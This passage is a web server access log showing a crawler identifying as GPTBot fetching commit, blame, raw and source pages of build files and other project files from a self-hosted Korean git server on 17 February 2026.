192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/import%20sys.py" -[17/Feb/2026:14:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/package.json" -[17/Feb/2026:14:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/status.json" -[17/Feb/2026:14:48:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2ftypes.ts" [Client 74.7.227.38] [Length 23310] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts" -[17/Feb/2026:14:48:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2findex.tsx" [Client 74.7.227.38] [Length 23410] [Gzip 3.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx" -[17/Feb/2026:14:48:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb" [Client 74.7.227.38] [Length 10071] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" -[17/Feb/2026:14:48:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f" [Client 74.7.227.38] [Length 10395] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" -[17/Feb/2026:14:48:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fproject.assets.json" [Client 74.7.227.38] [Length 20725] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json" -[17/Feb/2026:14:48:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10906] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs" -[17/Feb/2026:14:48:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10937] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs" -[17/Feb/2026:14:48:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:48:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14825] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:48:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:48:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14855] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:48:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14856] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:48:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9957] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:48:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 10893] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:14:48:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10937] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build" -[17/Feb/2026:14:48:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10776] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build" -[17/Feb/2026:14:48:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9900] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:48:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9927] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:48:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 24000] [Gzip 15.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:48:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 23965] [Gzip 15.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:48:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:48:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:49:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16187] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build" -[17/Feb/2026:14:49:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10937] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build" -[17/Feb/2026:14:49:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip" -[17/Feb/2026:14:49:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/TestApp" -[17/Feb/2026:14:49:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11827] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:49:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29813] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:49:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11195] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:49:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11165] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:49:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14642] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:49:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11102] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:49:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11271] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:49:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/TestApp" -[17/Feb/2026:14:49:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/TestApp" -[17/Feb/2026:14:49:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16921] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/Makefile" -[17/Feb/2026:14:49:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51205] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/TestApp" -[17/Feb/2026:14:49:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11023] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:49:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:49:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:49:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10178] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:49:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:49:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39743] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:49:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:49:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:49:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:49:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr 